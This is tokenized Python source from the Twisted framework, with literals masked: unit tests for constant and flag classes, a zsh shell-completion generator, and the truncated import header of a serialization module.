"""<STR_LIT>""" <EOL> self . assertEqual ( "<STR_LIT>" , repr ( self . STATUS . OK ) ) <EOL> def test_lookupByName ( self ) : <EOL> """<STR_LIT>""" <EOL> method = self . STATUS . lookupByName ( "<STR_LIT:OK>" ) <EOL> self . assertIdentical ( self . STATUS . OK , method ) <EOL> def test_notLookupMissingByName ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( ValueError , self . STATUS . lookupByName , "<STR_LIT>" ) <EOL> self . assertRaises ( ValueError , self . STATUS . lookupByName , "<STR_LIT>" ) <EOL> self . assertRaises ( ValueError , self . STATUS . lookupByName , "<STR_LIT:foo>" ) <EOL> def test_lookupByValue ( self ) : <EOL> """<STR_LIT>""" <EOL> status = self . STATUS . lookupByValue ( "<STR_LIT>" ) <EOL> self . assertIdentical ( self . STATUS . OK , status ) <EOL> def test_lookupDuplicateByValue ( self ) : <EOL> """<STR_LIT>""" <EOL> class TRANSPORT_MESSAGE ( Values ) : <EOL> """<STR_LIT>""" <EOL> KEX_DH_GEX_REQUEST_OLD = ValueConstant ( <NUM_LIT:30> ) <EOL> KEXDH_INIT = ValueConstant ( <NUM_LIT:30> ) <EOL> self . assertIdentical ( <EOL> TRANSPORT_MESSAGE . lookupByValue ( <NUM_LIT:30> ) , <EOL> TRANSPORT_MESSAGE . KEX_DH_GEX_REQUEST_OLD ) <EOL> def test_notLookupMissingByValue ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( ValueError , self . STATUS . lookupByValue , "<STR_LIT:OK>" ) <EOL> self . assertRaises ( ValueError , self . STATUS . lookupByValue , <NUM_LIT:200> ) <EOL> self . assertRaises ( ValueError , self . STATUS . lookupByValue , "<STR_LIT>" ) <EOL> def test_name ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( "<STR_LIT:OK>" , self . STATUS . OK . name ) <EOL> def test_attributeIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertIdentical ( self . STATUS . OK , self . STATUS . OK ) <EOL> def test_iterconstants ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . STATUS . iterconstants ( ) ) <EOL> self . assertEqual ( <EOL> [ self . STATUS . OK , self . STATUS . NOT_FOUND ] , <EOL> constants ) <EOL> def test_attributeIterconstantsIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . STATUS . iterconstants ( ) ) <EOL> self . assertIdentical ( self . STATUS . OK , constants [ <NUM_LIT:0> ] ) <EOL> self . assertIdentical ( self . STATUS . NOT_FOUND , constants [ <NUM_LIT:1> ] ) <EOL> def test_iterconstantsIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . STATUS . iterconstants ( ) ) <EOL> again = list ( self . STATUS . iterconstants ( ) ) <EOL> self . assertIdentical ( again [ <NUM_LIT:0> ] , constants [ <NUM_LIT:0> ] ) <EOL> self . assertIdentical ( again [ <NUM_LIT:1> ] , constants [ <NUM_LIT:1> ] ) <EOL> def test_initializedOnce ( self ) : <EOL> """<STR_LIT>""" <EOL> first = self . STATUS . _enumerants <EOL> self . STATUS . OK <EOL> second = self . STATUS . _enumerants <EOL> self . assertIdentical ( first , second ) <EOL> class _FlagsTestsMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> class FXF ( Flags ) : <EOL> READ = FlagConstant ( ) <EOL> WRITE = FlagConstant ( ) <EOL> APPEND = FlagConstant ( ) <EOL> EXCLUSIVE = FlagConstant ( <NUM_LIT> ) <EOL> TEXT = FlagConstant ( ) <EOL> self . FXF = FXF <EOL> class FlagsTests ( _FlagsTestsMixin , TestCase , _ConstantsTestsMixin ) : <EOL> """<STR_LIT>""" <EOL> def test_notInstantiable ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _notInstantiableTest ( "<STR_LIT>" , self . FXF ) <EOL> def test_symbolicAttributes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( hasattr ( self . FXF , "<STR_LIT>" ) ) <EOL> self . assertTrue ( hasattr ( self . FXF , "<STR_LIT>" ) ) <EOL> self . assertTrue ( hasattr ( self . FXF , "<STR_LIT>" ) ) <EOL> self . assertTrue ( hasattr ( self . FXF , "<STR_LIT>" ) ) <EOL> self . assertTrue ( hasattr ( self . FXF , "<STR_LIT>" ) ) <EOL> def test_withoutOtherAttributes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( hasattr ( self . FXF , "<STR_LIT:foo>" ) ) <EOL> def test_representation ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( "<STR_LIT>" , repr ( self . FXF . READ ) ) <EOL> def test_lookupByName ( self ) : <EOL> """<STR_LIT>""" <EOL> flag = self . FXF . lookupByName ( "<STR_LIT>" ) <EOL> self . assertIdentical ( self . FXF . READ , flag ) <EOL> def test_notLookupMissingByName ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( ValueError , self . FXF . lookupByName , "<STR_LIT>" ) <EOL> self . assertRaises ( ValueError , self . FXF . lookupByName , "<STR_LIT>" ) <EOL> self . assertRaises ( ValueError , self . FXF . lookupByName , "<STR_LIT:foo>" ) <EOL> def test_lookupByValue ( self ) : <EOL> """<STR_LIT>""" <EOL> flag = self . FXF . lookupByValue ( <NUM_LIT> ) <EOL> self . assertIdentical ( flag , self . FXF . READ ) <EOL> flag = self . FXF . lookupByValue ( <NUM_LIT> ) <EOL> self . assertIdentical ( flag , self . FXF . WRITE ) <EOL> flag = self . FXF . lookupByValue ( <NUM_LIT> ) <EOL> self . assertIdentical ( flag , self . FXF . APPEND ) <EOL> flag = self . FXF . lookupByValue ( <NUM_LIT> ) <EOL> self . assertIdentical ( flag , self . FXF . EXCLUSIVE ) <EOL> flag = self . FXF . lookupByValue ( <NUM_LIT> ) <EOL> self . assertIdentical ( flag , self . FXF . TEXT ) <EOL> def test_lookupDuplicateByValue ( self ) : <EOL> """<STR_LIT>""" <EOL> class TIMEX ( Flags ) : <EOL> ADJ_OFFSET = FlagConstant ( <NUM_LIT> ) <EOL> MOD_OFFSET = FlagConstant ( <NUM_LIT> ) <EOL> self . assertIdentical ( TIMEX . lookupByValue ( <NUM_LIT> ) , TIMEX . ADJ_OFFSET ) <EOL> def test_notLookupMissingByValue ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( ValueError , self . FXF . lookupByValue , <NUM_LIT> ) <EOL> def test_name ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( "<STR_LIT>" , self . FXF . READ . name ) <EOL> def test_attributeIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertIdentical ( self . FXF . READ , self . FXF . READ ) <EOL> def test_iterconstants ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . FXF . iterconstants ( ) ) <EOL> self . assertEqual ( <EOL> [ self . FXF . READ , self . FXF . WRITE , self . FXF . APPEND , <EOL> self . FXF . EXCLUSIVE , self . FXF . TEXT ] , <EOL> constants ) <EOL> def test_attributeIterconstantsIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . FXF . iterconstants ( ) ) <EOL> self . assertIdentical ( self . FXF . READ , constants [ <NUM_LIT:0> ] ) <EOL> self . assertIdentical ( self . FXF . WRITE , constants [ <NUM_LIT:1> ] ) <EOL> self . assertIdentical ( self . FXF . APPEND , constants [ <NUM_LIT:2> ] ) <EOL> self . assertIdentical ( self . FXF . EXCLUSIVE , constants [ <NUM_LIT:3> ] ) <EOL> self . assertIdentical ( self . FXF . TEXT , constants [ <NUM_LIT:4> ] ) <EOL> def test_iterconstantsIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . FXF . iterconstants ( ) ) <EOL> again = list ( self . FXF . iterconstants ( ) ) <EOL> self . assertIdentical ( again [ <NUM_LIT:0> ] , constants [ <NUM_LIT:0> ] ) <EOL> self . assertIdentical ( again [ <NUM_LIT:1> ] , constants [ <NUM_LIT:1> ] ) <EOL> self . assertIdentical ( again [ <NUM_LIT:2> ] , constants [ <NUM_LIT:2> ] ) <EOL> self . assertIdentical ( again [ <NUM_LIT:3> ] , constants [ <NUM_LIT:3> ] ) <EOL> self . assertIdentical ( again [ <NUM_LIT:4> ] , constants [ <NUM_LIT:4> ] ) <EOL> def test_initializedOnce ( self ) : <EOL> """<STR_LIT>""" <EOL> first = self . FXF . _enumerants <EOL> self . FXF . READ <EOL> second = self . FXF . _enumerants <EOL> self . assertIdentical ( first , second ) <EOL> class FlagConstantSimpleOrTests ( _FlagsTestsMixin , TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_value ( self ) : <EOL> """<STR_LIT>""" <EOL> flag = self . FXF . READ | self . FXF . WRITE <EOL> self . assertEqual ( self . FXF . READ . value | self . FXF . WRITE . value , flag . value ) <EOL> def test_name ( self ) : <EOL> """<STR_LIT>""" <EOL> flag = self . FXF . READ | self . FXF . WRITE <EOL> self . assertEqual ( "<STR_LIT>" , flag . name ) <EOL> def test_representation ( self ) : <EOL> """<STR_LIT>""" <EOL> flag = self . FXF . READ | self . FXF . WRITE <EOL> self . assertEqual ( "<STR_LIT>" , repr ( flag ) ) <EOL> class FlagConstantSimpleAndTests ( _FlagsTestsMixin , TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_value ( self ) : <EOL> """<STR_LIT>""" <EOL> readWrite = ( self . FXF . READ | self . FXF . WRITE ) <EOL> writeAppend = ( self . FXF . WRITE | self . FXF . APPEND ) <EOL> flag = readWrite & writeAppend <EOL> self . assertEqual ( self . FXF . WRITE . value , flag . value ) <EOL> def test_name ( self ) : <EOL> """<STR_LIT>""" <EOL> readWrite = ( self . FXF . READ | self . FXF . WRITE ) <EOL> writeAppend = ( self . FXF . WRITE | self . FXF . APPEND ) <EOL> flag = readWrite & writeAppend <EOL> self . assertEqual ( "<STR_LIT>" , flag . name ) <EOL> def test_representation ( self ) : <EOL> """<STR_LIT>""" <EOL> readWrite = ( self . FXF . READ | self . FXF . WRITE ) <EOL> writeAppend = ( self . FXF . WRITE | self . FXF . APPEND ) <EOL> flag = readWrite & writeAppend <EOL> self . assertEqual ( "<STR_LIT>" , repr ( flag ) ) <EOL> class FlagConstantSimpleExclusiveOrTests ( _FlagsTestsMixin , TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_value ( self ) : <EOL> """<STR_LIT>""" <EOL> readWrite = ( self . FXF . READ | self . FXF . WRITE ) <EOL> writeAppend = ( self . FXF . WRITE | self . FXF . APPEND ) <EOL> flag = readWrite ^ writeAppend <EOL> self . assertEqual ( self . FXF . READ . value | self . FXF . APPEND . value , flag . value ) <EOL> def test_name ( self ) : <EOL> """<STR_LIT>""" <EOL> readWrite = ( self . FXF . READ | self . FXF . WRITE ) <EOL> writeAppend = ( self . FXF . WRITE | self . FXF . APPEND ) <EOL> flag = readWrite ^ writeAppend <EOL> self . assertEqual ( "<STR_LIT>" , flag . name ) <EOL> def test_representation ( self ) : <EOL> """<STR_LIT>""" <EOL> readWrite = ( self . FXF . READ | self . FXF . WRITE ) <EOL> writeAppend = ( self . FXF . WRITE | self . FXF . APPEND ) <EOL> flag = readWrite ^ writeAppend <EOL> self . assertEqual ( "<STR_LIT>" , repr ( flag ) ) <EOL> class FlagConstantNegationTests ( _FlagsTestsMixin , TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_value ( self ) : <EOL> """<STR_LIT>""" <EOL> flag = ~ self . FXF . READ <EOL> self . assertEqual ( <EOL> self . FXF . WRITE . value | <EOL> self . FXF . APPEND . value | <EOL> self . FXF . EXCLUSIVE . value | <EOL> self . FXF . TEXT . value , <EOL> flag . value ) <EOL> flag = ~ self . FXF . WRITE <EOL> self . assertEqual ( <EOL> self . FXF . READ . value | <EOL> self . FXF . APPEND . value | <EOL> self . FXF . EXCLUSIVE . value | <EOL> self . FXF . TEXT . value , <EOL> flag . value ) <EOL> def test_name ( self ) : <EOL> """<STR_LIT>""" <EOL> flag = ~ self . FXF . WRITE <EOL> self . assertEqual ( "<STR_LIT>" , flag . name ) <EOL> def test_representation ( self ) : <EOL> """<STR_LIT>""" <EOL> flag = ~ self . FXF . WRITE <EOL> self . assertEqual ( "<STR_LIT>" , repr ( flag ) ) </s>
<s> """<STR_LIT>""" <EOL> import warnings <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , DeprecationWarning , stacklevel = <NUM_LIT:2> ) <EOL> import itertools , sys , commands , os . path <EOL> from twisted . python import reflect , util , usage <EOL> from twisted . application . service import IServiceMaker <EOL> class MyOptions ( usage . Options ) : <EOL> """<STR_LIT>""" <EOL> longdesc = "<STR_LIT>" <EOL> synopsis = "<STR_LIT>" <EOL> optFlags = [ [ "<STR_LIT>" , "<STR_LIT:i>" , <EOL> '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' ] ] <EOL> optParameters = [ [ "<STR_LIT>" , "<STR_LIT:d>" , None , <EOL> "<STR_LIT>" ] ] <EOL> def postOptions ( self ) : <EOL> if self [ '<STR_LIT>' ] and self [ '<STR_LIT>' ] : <EOL> raise usage . UsageError , "<STR_LIT>" "<STR_LIT>" <EOL> if not self [ '<STR_LIT>' ] and not self [ '<STR_LIT>' ] : <EOL> raise usage . UsageError , "<STR_LIT>" <EOL> if self [ '<STR_LIT>' ] and not os . path . isdir ( self [ '<STR_LIT>' ] ) : <EOL> raise usage . UsageError , "<STR_LIT>" % self [ '<STR_LIT>' ] <EOL> class Builder : <EOL> def __init__ ( self , cmd_name , options , file ) : <EOL> """<STR_LIT>""" <EOL> self . cmd_name = cmd_name <EOL> self . options = options <EOL> self . file = file <EOL> def write ( self ) : <EOL> """<STR_LIT>""" <EOL> self . file . write ( '<STR_LIT>' % ( self . cmd_name , ) ) <EOL> gen = ArgumentsGenerator ( self . cmd_name , self . options , self . file ) <EOL> gen . write ( ) <EOL> class SubcommandBuilder ( Builder ) : <EOL> """<STR_LIT>""" <EOL> interface = None <EOL> subcmdLabel = None <EOL> def write ( self ) : <EOL> """<STR_LIT>""" <EOL> self . file . write ( '<STR_LIT>' % ( self . cmd_name , ) ) <EOL> self . file . write ( '<STR_LIT>' ) <EOL> from twisted import plugin as newplugin <EOL> plugins = newplugin . getPlugins ( self . interface ) <EOL> for p in plugins : <EOL> self . file . write ( '<STR_LIT>' % ( p . tapname , p . description ) ) <EOL> self . file . write ( "<STR_LIT>" ) <EOL> self . options . __class__ . zsh_extras = [ '<STR_LIT>' ] <EOL> gen = ArgumentsGenerator ( self . cmd_name , self . options , self . file ) <EOL> gen . write ( ) <EOL> self . file . write ( """<STR_LIT>""" % ( self . subcmdLabel , ) ) <EOL> plugins = newplugin . getPlugins ( self . interface ) <EOL> for p in plugins : <EOL> self . file . write ( p . tapname + "<STR_LIT>" ) <EOL> gen = ArgumentsGenerator ( p . tapname , p . options ( ) , self . file ) <EOL> gen . write ( ) <EOL> self . file . write ( "<STR_LIT>" ) <EOL> self . file . write ( "<STR_LIT>" "<STR_LIT>" ) <EOL> class MktapBuilder ( SubcommandBuilder ) : <EOL> """<STR_LIT>""" <EOL> interface = IServiceMaker <EOL> subcmdLabel = '<STR_LIT>' <EOL> class TwistdBuilder ( SubcommandBuilder ) : <EOL> """<STR_LIT>""" <EOL> interface = IServiceMaker <EOL> subcmdLabel = '<STR_LIT>' <EOL> class ArgumentsGenerator : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , cmd_name , options , file ) : <EOL> """<STR_LIT>""" <EOL> self . cmd_name = cmd_name <EOL> self . options = options <EOL> self . file = file <EOL> self . altArgDescr = { } <EOL> self . actionDescr = { } <EOL> self . multiUse = [ ] <EOL> self . mutuallyExclusive = [ ] <EOL> self . actions = { } <EOL> self . extras = [ ] <EOL> aCL = reflect . accumulateClassList <EOL> aCD = reflect . accumulateClassDict <EOL> aCD ( options . __class__ , '<STR_LIT>' , self . altArgDescr ) <EOL> aCD ( options . __class__ , '<STR_LIT>' , self . actionDescr ) <EOL> aCL ( options . __class__ , '<STR_LIT>' , self . multiUse ) <EOL> aCL ( options . __class__ , '<STR_LIT>' , <EOL> self . mutuallyExclusive ) <EOL> aCD ( options . __class__ , '<STR_LIT>' , self . actions ) <EOL> aCL ( options . __class__ , '<STR_LIT>' , self . extras ) <EOL> optFlags = [ ] <EOL> optParams = [ ] <EOL> aCL ( options . __class__ , '<STR_LIT>' , optFlags ) <EOL> aCL ( options . __class__ , '<STR_LIT>' , optParams ) <EOL> for i , optList in enumerate ( optFlags ) : <EOL> if len ( optList ) != <NUM_LIT:3> : <EOL> optFlags [ i ] = util . padTo ( <NUM_LIT:3> , optList ) <EOL> for i , optList in enumerate ( optParams ) : <EOL> if len ( optList ) != <NUM_LIT:4> : <EOL> optParams [ i ] = util . padTo ( <NUM_LIT:4> , optList ) <EOL> self . optFlags = optFlags <EOL> self . optParams = optParams <EOL> optParams_d = { } <EOL> for optList in optParams : <EOL> optParams_d [ optList [ <NUM_LIT:0> ] ] = optList [ <NUM_LIT:1> : ] <EOL> self . optParams_d = optParams_d <EOL> optFlags_d = { } <EOL> for optList in optFlags : <EOL> optFlags_d [ optList [ <NUM_LIT:0> ] ] = optList [ <NUM_LIT:1> : ] <EOL> self . optFlags_d = optFlags_d <EOL> optAll_d = { } <EOL> optAll_d . update ( optParams_d ) <EOL> optAll_d . update ( optFlags_d ) <EOL> self . optAll_d = optAll_d <EOL> self . addAdditionalOptions ( ) <EOL> self . verifyZshNames ( ) <EOL> self . excludes = self . makeExcludesDict ( ) <EOL> def write ( self ) : <EOL> """<STR_LIT>""" <EOL> self . writeHeader ( ) <EOL> self . writeExtras ( ) <EOL> self . writeOptions ( ) <EOL> self . writeFooter ( ) <EOL> def writeHeader ( self ) : <EOL> """<STR_LIT>""" <EOL> self . file . write ( '<STR_LIT>' ) <EOL> def writeOptions ( self ) : <EOL> """<STR_LIT>""" <EOL> optNames = self . optAll_d . keys ( ) <EOL> optNames . sort ( ) <EOL> for longname in optNames : <EOL> self . writeOpt ( longname ) <EOL> def writeExtras ( self ) : <EOL> """<STR_LIT>""" <EOL> for s in self . extras : <EOL> self . file . write ( escape ( s ) ) <EOL> self . file . write ( '<STR_LIT>' ) <EOL> def writeFooter ( self ) : <EOL> """<STR_LIT>""" <EOL> self . file . write ( '<STR_LIT>' ) <EOL> def verifyZshNames ( self ) : <EOL> """<STR_LIT>""" <EOL> def err ( name ) : <EOL> raise ValueError , "<STR_LIT>" "<STR_LIT>" % ( <EOL> name , self . cmd_name ) <EOL> for name in itertools . chain ( self . altArgDescr , self . actionDescr , <EOL> self . actions , self . multiUse ) : <EOL> if name not in self . optAll_d : <EOL> err ( name ) <EOL> for seq in self . mutuallyExclusive : <EOL> for name in seq : <EOL> if name not in self . optAll_d : <EOL> err ( name ) <EOL> def excludeStr ( self , longname , buildShort = False ) : <EOL> """<STR_LIT>""" <EOL> if longname in self . excludes : <EOL> exclusions = self . excludes [ longname ] [ : ] <EOL> else : <EOL> exclusions = [ ] <EOL> if longname not in self . multiUse : <EOL> if buildShort is False : <EOL> short = self . getShortOption ( longname ) <EOL> if short is not None : <EOL> exclusions . append ( short ) <EOL> else : <EOL> exclusions . append ( longname ) <EOL> if not exclusions : <EOL> return '<STR_LIT>' <EOL> strings = [ ] <EOL> for optName in exclusions : <EOL> if len ( optName ) == <NUM_LIT:1> : <EOL> strings . append ( "<STR_LIT:->" + optName ) <EOL> else : <EOL> strings . append ( "<STR_LIT>" + optName ) <EOL> return "<STR_LIT>" % "<STR_LIT:U+0020>" . join ( strings ) <EOL> def makeExcludesDict ( self ) : <EOL> """<STR_LIT>""" <EOL> longToShort = { } <EOL> for optList in itertools . chain ( self . optParams , self . optFlags ) : <EOL> try : <EOL> if optList [ <NUM_LIT:1> ] != None : <EOL> longToShort [ optList [ <NUM_LIT:0> ] ] = optList [ <NUM_LIT:1> ] <EOL> except IndexError : <EOL> pass <EOL> excludes = { } <EOL> for lst in self . mutuallyExclusive : <EOL> for i , longname in enumerate ( lst ) : <EOL> tmp = [ ] <EOL> tmp . extend ( lst [ : i ] ) <EOL> tmp . extend ( lst [ i + <NUM_LIT:1> : ] ) <EOL> for name in tmp [ : ] : <EOL> if name in longToShort : <EOL> tmp . append ( longToShort [ name ] ) <EOL> if longname in excludes : <EOL> excludes [ longname ] . extend ( tmp ) <EOL> else : <EOL> excludes [ longname ] = tmp <EOL> return excludes <EOL> def writeOpt ( self , longname ) : <EOL> """<STR_LIT>""" <EOL> if longname in self . optFlags_d : <EOL> long_field = "<STR_LIT>" % longname <EOL> else : <EOL> long_field = "<STR_LIT>" % longname <EOL> short = self . getShortOption ( longname ) <EOL> if short != None : <EOL> short_field = "<STR_LIT:->" + short <EOL> else : <EOL> short_field = '<STR_LIT>' <EOL> descr = self . getDescription ( longname ) <EOL> descr_field = descr . replace ( "<STR_LIT:[>" , "<STR_LIT>" ) <EOL> descr_field = descr_field . replace ( "<STR_LIT:]>" , "<STR_LIT>" ) <EOL> descr_field = '<STR_LIT>' % descr_field <EOL> if longname in self . actionDescr : <EOL> actionDescr_field = self . actionDescr [ longname ] <EOL> else : <EOL> actionDescr_field = descr <EOL> action_field = self . getAction ( longname ) <EOL> if longname in self . multiUse : <EOL> multi_field = '<STR_LIT:*>' <EOL> else : <EOL> multi_field = '<STR_LIT>' <EOL> longExclusions_field = self . excludeStr ( longname ) <EOL> if short : <EOL> shortExclusions_field = self . excludeStr ( longname , buildShort = True ) <EOL> self . file . write ( escape ( '<STR_LIT>' % ( shortExclusions_field , <EOL> multi_field , short_field , descr_field , action_field ) ) ) <EOL> self . file . write ( '<STR_LIT>' ) <EOL> self . file . write ( escape ( '<STR_LIT>' % ( longExclusions_field , <EOL> multi_field , long_field , descr_field , action_field ) ) ) <EOL> self . file . write ( '<STR_LIT>' ) <EOL> def getAction ( self , longname ) : <EOL> """<STR_LIT>""" <EOL> if longname in self . actions : <EOL> if callable ( self . actions [ longname ] ) : <EOL> action = self . actions [ longname ] ( ) <EOL> else : <EOL> action = self . actions [ longname ] <EOL> return "<STR_LIT>" % ( self . getActionDescr ( longname ) , action ) <EOL> if longname in self . optParams_d : <EOL> return '<STR_LIT>' % self . getActionDescr ( longname ) <EOL> return '<STR_LIT>' <EOL> def getActionDescr ( self , longname ) : <EOL> """<STR_LIT>""" <EOL> if longname in self . actionDescr : <EOL> return self . actionDescr [ longname ] <EOL> else : <EOL> return longname <EOL> def getDescription ( self , longname ) : <EOL> """<STR_LIT>""" <EOL> if longname in self . altArgDescr : <EOL> return self . altArgDescr [ longname ] <EOL> try : <EOL> descr = self . optFlags_d [ longname ] [ <NUM_LIT:1> ] <EOL> except KeyError : <EOL> try : <EOL> descr = self . optParams_d [ longname ] [ <NUM_LIT:2> ] <EOL> except KeyError : <EOL> descr = None <EOL> if descr is not None : <EOL> return descr <EOL> longMangled = longname . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> obj = getattr ( self . options , '<STR_LIT>' % longMangled , None ) <EOL> if obj : <EOL> descr = descrFromDoc ( obj ) <EOL> if descr is not None : <EOL> return descr <EOL> return longname <EOL> def getShortOption ( self , longname ) : <EOL> """<STR_LIT>""" <EOL> optList = self . optAll_d [ longname ] <EOL> try : <EOL> return optList [ <NUM_LIT:0> ] or None <EOL> except IndexError : <EOL> pass <EOL> def addAdditionalOptions ( self ) : <EOL> """<STR_LIT>""" <EOL> methodsDict = { } <EOL> reflect . accumulateMethods ( self . options , methodsDict , '<STR_LIT>' ) <EOL> methodToShort = { } <EOL> for name in methodsDict . copy ( ) : <EOL> if len ( name ) == <NUM_LIT:1> : <EOL> methodToShort [ methodsDict [ name ] ] = name <EOL> del methodsDict [ name ] <EOL> for methodName , methodObj in methodsDict . items ( ) : <EOL> longname = methodName . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) <EOL> if longname in self . optAll_d : <EOL> continue <EOL> descr = self . getDescription ( longname ) <EOL> short = None <EOL> if methodObj in methodToShort : <EOL> short = methodToShort [ methodObj ] <EOL> reqArgs = methodObj . im_func . func_code . co_argcount <EOL> if reqArgs == <NUM_LIT:2> : <EOL> self . optParams . append ( [ longname , short , None , descr ] ) <EOL> self . optParams_d [ longname ] = [ short , None , descr ] <EOL> self . optAll_d [ longname ] = [ short , None , descr ] <EOL> elif reqArgs == <NUM_LIT:1> : <EOL> self . optFlags . append ( [ longname , short , descr ] ) <EOL> self . optFlags_d [ longname ] = [ short , descr ] <EOL> self . optAll_d [ longname ] = [ short , None , descr ] <EOL> else : <EOL> raise TypeError , '<STR_LIT>' '<STR_LIT>' % ( methodObj , ) <EOL> def descrFromDoc ( obj ) : <EOL> """<STR_LIT>""" <EOL> if obj . __doc__ is None : <EOL> return None <EOL> lines = obj . __doc__ . split ( "<STR_LIT:\n>" ) <EOL> descr = None <EOL> try : <EOL> if lines [ <NUM_LIT:0> ] != "<STR_LIT>" and not lines [ <NUM_LIT:0> ] . isspace ( ) : <EOL> descr = lines [ <NUM_LIT:0> ] . lstrip ( ) <EOL> elif lines [ <NUM_LIT:1> ] != "<STR_LIT>" and not lines [ <NUM_LIT:1> ] . isspace ( ) : <EOL> descr = lines [ <NUM_LIT:1> ] . lstrip ( ) <EOL> except IndexError : <EOL> pass <EOL> return descr <EOL> def firstLine ( s ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> i = s . index ( '<STR_LIT:\n>' ) <EOL> return s [ : i ] <EOL> except ValueError : <EOL> return s <EOL> def escape ( str ) : <EOL> """<STR_LIT>""" <EOL> return commands . mkarg ( str ) [ <NUM_LIT:1> : ] <EOL> def siteFunctionsPath ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> cmd = "<STR_LIT>" <EOL> output = commands . getoutput ( cmd ) <EOL> if os . path . isdir ( output ) : <EOL> return output <EOL> except : <EOL> pass <EOL> generateFor = [ ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> specialBuilders = { '<STR_LIT>' : MktapBuilder , <EOL> '<STR_LIT>' : TwistdBuilder } <EOL> def makeCompFunctionFiles ( out_path , generateFor = generateFor , <EOL> specialBuilders = specialBuilders ) : <EOL> """<STR_LIT>""" <EOL> skips = [ ] <EOL> for cmd_name , module_name , class_name in generateFor : <EOL> if module_name is None : <EOL> f = _openCmdFile ( out_path , cmd_name ) <EOL> f . close ( ) <EOL> continue <EOL> try : <EOL> m = __import__ ( '<STR_LIT:%s>' % ( module_name , ) , None , None , ( class_name ) ) <EOL> f = _openCmdFile ( out_path , cmd_name ) <EOL> o = getattr ( m , class_name ) ( ) <EOL> if cmd_name in specialBuilders : <EOL> b = specialBuilders [ cmd_name ] ( cmd_name , o , f ) <EOL> b . write ( ) <EOL> else : <EOL> b = Builder ( cmd_name , o , f ) <EOL> b . write ( ) <EOL> except Exception , e : <EOL> skips . append ( ( cmd_name , e ) ) <EOL> continue <EOL> return skips <EOL> def _openCmdFile ( out_path , cmd_name ) : <EOL> return file ( os . path . join ( out_path , '<STR_LIT:_>' + cmd_name ) , '<STR_LIT:w>' ) <EOL> def run ( ) : <EOL> options = MyOptions ( ) <EOL> try : <EOL> options . parseOptions ( sys . argv [ <NUM_LIT:1> : ] ) <EOL> except usage . UsageError , e : <EOL> print e <EOL> print options . getUsage ( ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> if options [ '<STR_LIT>' ] : <EOL> import twisted <EOL> dir = os . path . join ( os . path . dirname ( twisted . __file__ ) , "<STR_LIT>" , "<STR_LIT>" ) <EOL> skips = makeCompFunctionFiles ( dir ) <EOL> else : <EOL> skips = makeCompFunctionFiles ( options [ '<STR_LIT>' ] ) <EOL> for cmd_name , error in skips : <EOL> sys . stderr . write ( "<STR_LIT>" "<STR_LIT>" % ( cmd_name , ) ) <EOL> sys . stderr . write ( str ( error ) + '<STR_LIT:\n>' ) <EOL> if skips : <EOL> sys . exit ( <NUM_LIT:3> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> run ( ) </s>
<s> """<STR_LIT>""" <EOL> import pickle <EOL> import types <EOL> import warnings <EOL> from types import StringType <EOL> from types import UnicodeType <EOL> from types import IntType <EOL> from types import TupleType <EOL> from types import ListType <EOL> from types import LongType <EOL> from types import FloatType <EOL> from types import FunctionType <EOL> from types import MethodType <EOL> from types import ModuleType <EOL> from types import DictionaryType <EOL> from types import InstanceType <EOL> from types import NoneType <EOL> from types import ClassType <EOL> import copy <EOL> import datetime <EOL> from types import BooleanType <EOL> try : <EOL> import decimal <EOL> except ImportError : <EOL> decimal = None <EOL> try : <EOL> _set = set <EOL> except NameError : <EOL> _set = None <EOL> try : <EOL> warnings . filterwarnings ( "<STR_LIT:ignore>" , category = DeprecationWarning , <EOL> message = 